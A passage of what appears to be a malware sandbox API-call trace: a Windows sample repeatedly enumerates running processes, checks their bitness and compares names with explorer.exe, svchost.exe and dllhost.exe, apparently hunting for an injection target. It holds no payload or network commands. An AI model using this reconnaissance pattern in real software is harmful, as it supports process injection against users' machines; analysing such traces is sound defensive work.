pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0211.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0211.498] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0211.499] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0211.499] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.499] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.499] CloseHandle (hObject=0xec) returned 1 [0211.499] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0211.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0211.500] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.500] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.500] CloseHandle (hObject=0xec) returned 1 [0211.500] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0211.500] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0211.501] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.501] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.501] CloseHandle (hObject=0xec) returned 1 [0211.501] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0211.501] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0211.501] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.501] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.501] CloseHandle (hObject=0xec) returned 1 [0211.501] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.576] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0211.577] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.577] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.577] CloseHandle (hObject=0xec) returned 1 [0211.577] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0211.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0211.577] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.577] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0211.577] CloseHandle (hObject=0xec) returned 1 [0211.577] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0211.577] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0211.577] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0211.577] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0211.578] CloseHandle (hObject=0xe8) returned 1 [0211.578] Sleep (dwMilliseconds=0x3e8) [0212.606] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0212.609] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0212.610] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0212.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0212.610] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0212.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0212.611] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0212.611] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0212.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0212.612] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0212.612] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0212.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0212.613] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0212.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0212.613] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0212.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0212.614] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0212.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0212.614] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0212.615] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0212.615] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0212.616] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0212.616] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0212.617] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0212.617] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0212.618] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0212.618] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0212.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0212.619] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.619] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.619] CloseHandle (hObject=0xec) returned 1 [0212.619] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0212.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0212.619] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0212.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0212.620] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.620] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.620] CloseHandle (hObject=0xec) returned 1 [0212.620] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0212.620] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0212.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0212.621] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0212.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0212.621] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.621] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.621] CloseHandle (hObject=0xec) returned 1 [0212.621] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0212.622] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0212.622] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0212.622] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0212.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0212.622] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.622] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.622] CloseHandle (hObject=0xec) returned 1 [0212.622] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0212.622] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0212.622] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0212.622] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0212.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0212.623] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.623] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.623] CloseHandle (hObject=0xec) returned 1 [0212.623] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0212.623] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0212.623] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0212.623] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0212.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0212.624] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.624] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.624] CloseHandle (hObject=0xec) returned 1 [0212.624] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0212.624] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0212.624] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0212.624] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0212.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0212.624] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.624] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.624] CloseHandle (hObject=0xec) returned 1 [0212.624] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0212.624] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0212.624] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0212.624] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0212.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0212.625] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.625] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.625] CloseHandle (hObject=0xec) returned 1 [0212.625] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0212.625] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0212.625] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0212.625] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0212.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0212.626] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.626] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.626] CloseHandle (hObject=0xec) returned 1 [0212.626] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0212.626] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0212.626] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0212.626] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0212.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0212.626] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.626] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.626] CloseHandle (hObject=0xec) returned 1 [0212.626] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0212.627] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0212.627] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0212.627] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0212.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0212.627] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.627] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.627] CloseHandle (hObject=0xec) returned 1 [0212.627] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0212.627] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0212.627] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0212.627] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0212.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0212.628] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.628] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.628] CloseHandle (hObject=0xec) returned 1 [0212.628] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0212.628] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0212.628] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0212.628] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0212.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0212.628] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.628] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.629] CloseHandle (hObject=0xec) returned 1 [0212.629] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0212.629] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0212.629] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0212.629] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, 